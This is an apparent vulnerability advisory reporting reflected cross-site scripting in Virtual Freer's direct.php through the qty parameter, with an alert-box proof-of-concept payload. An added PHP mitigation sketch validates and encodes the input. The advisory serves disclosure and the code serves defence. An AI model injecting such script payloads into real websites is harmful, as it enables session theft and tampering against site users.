[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title: Virtual Freer Reflected Cross Site Scripting
[+]
[+] Exploit Author: Milad Hacking
[+]
[+] Discovered By: Milad Hacking
[+]
[+] Vendor Homepage : http://freer.ir/virtual/
[+]
[+] Date: 2016-03-01
[+]
[+] Tested on: Kali Linux / Iceweasel
[+]
[+] Software link : http://freer.ir/virtual/download.php?action=get
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+] Screenshot : http://up.ashiyane.org/images/sg53t4duy1n2g5xnfwm5.png

[+]  Location : site.com/direct.php?card=[cartid]&qty=1"><script>alert(/xss testing/)</script>
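[+] Mitigation sketch (added example, not code from Virtual Freer or from the advisory author): the `">` in the payload implies that qty is echoed into a quoted HTML attribute, so the defence is to accept only an integer and to encode on output. The function names, the 1..100 quantity limit and the assumption that card is a numeric id are hypothetical; the real direct.php source is not shown on this page.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers: Virtual Freer's real direct.php is not shown in the advisory.

/** Return the parameter as an int within [$min, $max], or null if it is anything else. */
function parse_int_param(array $query, string $name, int $min, int $max): ?int
{
    $raw = $query[$name] ?? null;
    if (!is_string($raw)) {
        return null; // missing, or an array such as qty[]=1
    }
    $value = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => $min, 'max_range' => $max],
    ]);
    return $value === false ? null : $value;
}

/** Encode for HTML text and quoted-attribute contexts (both quote styles). */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Build the order form fields; rejected input is never reflected back. */
function render_order_fields(array $query): string
{
    $card = parse_int_param($query, 'card', 1, PHP_INT_MAX); // assumed numeric id
    $qty  = parse_int_param($query, 'qty', 1, 100);          // assumed business limit
    if ($card === null || $qty === null) {
        return '<p>Invalid request.</p>';
    }
    return sprintf(
        '<input type="hidden" name="card" value="%s"><input type="number" name="qty" value="%s">',
        h((string) $card),
        h((string) $qty)
    );
}

// Constructed inputs: the advisory's test string and a normal request.
$reported = ['card' => '19', 'qty' => '1"><script>alert(/xss testing/)</script>'];
$normal   = ['card' => '19', 'qty' => '2'];

echo render_order_fields($reported), PHP_EOL; // rejected by validation
echo render_order_fields($normal), PHP_EOL;   // rendered with qty=2
echo h($reported['qty']), PHP_EOL;            // encoding alone also neutralises the quote and angle brackets
```

In a live script the same functions would be called with `$_GET` in place of the constructed arrays.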

[+] Demo :



Ya FaTeme Zahra

[+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+]

Special thanks to: iliya Norton - Milad Hacking - Mohamad Ghasemi
- irhblackhat - Distr0watch - N3TC4T - Ac!D - Mr.G}{o$t  - MRS4JJ4D  -  Nazila Blackhat -  Bl4ck_MohajeM  -
 Ehsan Hosseini - Ali Inject0r - Peyman C4t And All Ashiyane Digital Security Team

[+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+]

Greetz to: My Lord Allah
https://telegram.me/thehacking
http://upbash.ir
milad.hacking.blackhat@Gmail.com
[+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+]